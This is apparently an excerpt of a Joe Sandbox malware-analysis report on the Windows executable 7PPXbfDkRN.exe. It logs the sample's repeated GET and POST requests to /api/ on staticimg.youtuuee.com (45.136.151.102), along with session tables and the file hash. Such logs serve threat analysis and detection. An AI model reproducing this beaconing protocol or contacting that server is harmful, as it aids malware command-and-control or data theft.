Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 34 39 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 34 61 5a 56 68 63 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35\r\n{"sid":2149491,"time":1635061578,"rand_str":"4aZVhc"}\r\n0\r\n\r\n

Oct 24, 2021 09:46:18.781927109 CEST    1332 kB    OUT
POST /api/?sid=2149491&key=a900675f9a8d56a24a79c8f6976efc9f HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:18.936049938 CEST    1333 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\n{"status":3}\r\n0\r\n\r\n

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
60          192.168.2.5  49829        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
61          192.168.2.5  49832        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
62          192.168.2.5  49836        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
63          192.168.2.5  49840        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
64          192.168.2.5  49844        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
65          192.168.2.5  49845        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
66          192.168.2.5  49846        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
67          192.168.2.5  49847        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
68          192.168.2.5  49848        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
69          192.168.2.5  49849        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data
No HTTP packets are listed for sessions 60 to 69 in the report.

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
7           192.168.2.5  49755        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data

Oct 24, 2021 09:46:20.000674009 CEST    1334 kB    OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:20.147985935 CEST    1334 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 35 34 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4b 41 6d 64 43 72 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35\r\n{"sid":2149549,"time":1635061580,"rand_str":"KAmdCr"}\r\n0\r\n\r\n

Oct 24, 2021 09:46:20.284533978 CEST    1335 kB    OUT
POST /api/?sid=2149549&key=ef8fb823e4ca08a782cf605473692aff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:20.434596062 CEST    1335 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\n{"status":3}\r\n0\r\n\r\n

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
70          192.168.2.5  49850        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
71          192.168.2.5  49851        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
72          192.168.2.5  49852        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
73          192.168.2.5  49853        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
74          192.168.2.5  49856        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
75          192.168.2.5  49857        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
76          192.168.2.5  49858        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
77          192.168.2.5  49859        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
78          192.168.2.5  49860        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
79          192.168.2.5  49861        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data
No HTTP packets are listed for sessions 70 to 79 in the report.


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
8           192.168.2.5  49756        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data

Oct 24, 2021 09:46:21.431983948 CEST    1336 kB    OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:21.582541943 CEST    1337 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 36 31 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 6b 4b 6e 35 62 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35\r\n{"sid":2149615,"time":1635061581,"rand_str":"5kKn5b"}\r\n0\r\n\r\n

Oct 24, 2021 09:46:21.678189993 CEST    1337 kB    OUT
POST /api/?sid=2149615&key=2891fe78238bcde026f8e178fbf9a3c7 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:21.834268093 CEST    1338 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\n{"status":3}\r\n0\r\n\r\n

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
80          192.168.2.5  49862        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
81          192.168.2.5  49863        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
82          192.168.2.5  49869        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
83          192.168.2.5  49870        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
84          192.168.2.5  49871        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
85          192.168.2.5  49872        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
86          192.168.2.5  49873        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
87          192.168.2.5  49874        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
88          192.168.2.5  49875        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
89          192.168.2.5  49876        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data
No HTTP packets are listed for sessions 80 to 89 in the report.

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
9           192.168.2.5  49757        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data

Oct 24, 2021 09:46:22.728864908 CEST    1339 kB    OUT
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:22.873564959 CEST    1339 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 36 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 38 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 54 50 79 44 6a 71 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35\r\n{"sid":2149673,"time":1635061582,"rand_str":"TPyDjq"}\r\n0\r\n\r\n

Oct 24, 2021 09:46:22.986057997 CEST    1339 kB    OUT
POST /api/?sid=2149673&key=2f27b215dee998f785c084fa1eb07300 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:23.135428905 CEST    1340 kB    IN
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\n{"status":3}\r\n0\r\n\r\n


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
90          192.168.2.5  49878        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
91          192.168.2.5  49879        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
92          192.168.2.5  49880        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
93          192.168.2.5  49881        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
94          192.168.2.5  49882        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
95          192.168.2.5  49883        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
96          192.168.2.5  49884        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
97          192.168.2.5  49885        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
98          192.168.2.5  49886        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe
99          192.168.2.5  49887        45.136.151.102  80                C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp    kBytes transferred    Direction    Data
No HTTP packets are listed for sessions 90 to 99 in the report.


Joe Sandbox Cloud Basic 33.0.0 White Diamond

Code Manipulations

Statistics

System Behavior

Analysis Process: 7PPXbfDkRN.exe PID: 5172 Parent PID: 6124

General

Start time: 09:46:10
Start date: 24/10/2021
Path: C:\Users\user\Desktop\7PPXbfDkRN.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\Desktop\7PPXbfDkRN.exe'
Imagebase: 0x7ff6419c0000
File size: 1413632 bytes
MD5 hash: 1614D9ADFB1903A189E6EFD9B6DC4077
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

File Activities

File Read

Registry Activities

Key Created

Key Value Created

Disassembly

Code Analysis